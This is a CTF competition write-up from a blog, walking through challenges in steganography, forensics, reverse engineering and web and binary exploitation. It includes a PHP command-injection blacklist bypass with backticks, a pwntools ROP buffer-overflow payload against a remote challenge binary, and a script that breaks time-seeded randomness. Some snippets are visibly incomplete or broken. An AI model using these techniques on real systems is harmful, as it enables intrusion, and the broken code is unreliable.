Once again I was part of the hackerlab my country hosts yearly This year the competition was more intense than ever and my team zer0ne got placed 23rd on scoreboard and we made it to the finals (top 20 teams) on 18th position and I still don’t understand how XD

Unfortunately I am currently very busy so I could not participate in the final


Here is a quick recapitulative writeup


Ghezo (unsolved: 50pts)

This one traumatized me XD It was a steg/crypto chall worth 50 points…The minimum points and I could not solve that We got a 20 megabyte “png” picture. Yup you heard that right…20 mega-fricking-bytes Original file not provided because…damn THAT’S BIG! Instead here is a converted version


could not be more suspicious so obviously we ran file ghezo.png to see it’s actually a netbpm pixmap file the magic numbers are P3 and the extension should be .ppm. This format is uncompressed and the funny thing is that P3 allow ascii encoding to represent pixel values. A-MA-ZING!

I tried alot of things but could not manage this very unfamiliar file format so here is a script writen by those awesome people

import re
import numpy as np
from PIL import Image
from pathlib import Path

contents = Path('king.ppm').read_text()
Pidentifier, h, w,  *pixels = re.findall(r'[0-9]+', contents)
h = int(h)
w = int(w)

na = np.array(pixels[w*h*-3:], dtype=np.uint8).reshape((w,h,3))

Basically this converts the ppm to a real png fixing the conspicuously modified image height which reveals colored pixels…


The thing I needed to know at this very moment to solve this is Hexahue alphabet Damn this!

SPY (solved: 60pts)

Ok this one was easy! Forensics (sorry for file not provided :p) Basicaly open the provided mage.pdf and download The_magician.pdf attachment pro tip: It’s not a pdf Do some basic analysis (struggle first) then use virustotal for easier hindsights url from memory patterns: tcp:// Highly suspicious if you ask me

Asen hotagantin (unsolved: 70pts)


You see this png? guess what…this is no png This is an APNG yes “A” stands for animated and this is cleverly delayed so it’s hard to notice In the exif metadata you can see it’s made using EZGIF so just go there or use apngdis Anyway you get two frames and one is a stereogram…that’s what I missed…the frickin’ stereogram part Just use stegsolve

PHP GOAT (solved: 100pts)

This one too was not hard! Web challenge! Basically code injection with blacklisting bypass. Code is even provided


Just used my good old backtick (ls)


Tic tac toe (solved: 80pts)

Next is a bit tricky for web challenge but not hard. Experience is what helped me here:

  • Notice the .map file in minified js
  • Use sourcemapper (github) or anything else to “unmap” and get a clear js
  • notice in App.vue the commented out encrypt function
  • decode the AES…Here, like this…
const CryptoJS = require('crypto-js');
const k = '6cfad18816be65f2';
const output = "U2FsdGVkX1/sPQHn8qbrD9LyPIipROeMnqke4B+JJEq8sVgV0zeA+ab2oHP92avnl2vzHVBs0/0NeOLbGmoj9g==";

const decryptedBytes = CryptoJS.AES.decrypt(output, k);
const decryptedMessage = decryptedBytes.toString(CryptoJS.enc.Utf8);

console.log("Decrypted Message:", decryptedMessage);
  • Get a weird text and use the kitchen here is the sauce: XOR with key = 5 (its…magic bro)

Danxome (solved: 100pts)

This one was my favorite! (sorry again I deleted the binary file) Reverse chall and once again it was experience that saved me Elf64 making us wait for eternity using sleep…Been there done that Exemple of custom sleep library forged and called nosleeplib.so

/* nosleep.c */
#include <time.h>
#include <unistd.h>

unsigned int sleep(unsigned int seconds)
return 0;
int usleep(useconds_t usec)
return 0;
int nanosleep(const struct timespec *req, struct timespec *rem)
return 0;

patch it with LD_PRELOAD and wait a reasonable amount of time for the flag

U.T.C (unsolved 100pts)

Ok this one was quite cool but I could not solve this simplistic challenge Here look at the server code

Yeah you noticed the use of t = int(time.time()) and random.seed(t) too? I tried to bruteforce that…quite stupid you say? maybe! Actually the seeding makes it not-random-anymore Yup…basically…

import random
from pwn import *

#Connexion au serveur
r = remote('', 1873)
print('envoi de du choix "e" ...')

# Récupération du time
t = int(time.time())

#Récupération du message chiffré

# Process de déchiffrement
decrypted_treasure = []
for c in recept:
    rd = random.randint(0, 255)
    b = (int(c) - int(rd)) % 256
original_treasure = bytes(decrypted_treasure).decode()

As I did not solve it I will simply provide a link to my favorite solution

Le fâ (solved: 100pts)

Pwn challenge I could not pwn chall

from pwn import *

context.binary = "chall"
s = remote("", 2002)
s.sendafter(b": ",
  b"a"*0x28 + 
  p64(0x400b03) + # pop rdi
  p64(0x6010c0) + # username
  #p64(0x6010e0) + # password
  p64(0x4006a0)[:-1])  # puts

I won’t even try to explain just go here

Puzzle (solved: 120pts)

This one was weird and fun but could not solve it too. Here are the pieces

For part 2 I used cyberchef magic to retrieve this awesome cool photo of king behanzin


Annnd then I got stuck…well I could not find a solution writeup yet so I will update this when available

Qualification Stages

This year they “gently suggested” everyone who solved the qualifs should write a writeup (mostly to filter cheating I guess) So I will simply provide links to those pdf (mine for those I solved and my favorite solutions for others

Totally out of context but here is a beautiful image of AGOODJIE that was displayed on the challenge website


You needed to see it



I am very proud of my efforts this year as I could qualify for finals (kek)

I wish I had time to partake in finals…but I could not

That was an awesome experience and I had a lot of fun and still most importantly learnt alot!

Talented people still out there (shoutout to that monster guy unblvr )

Still alot for me to learn, and that’s once again what I am gonna do

keep learning folks!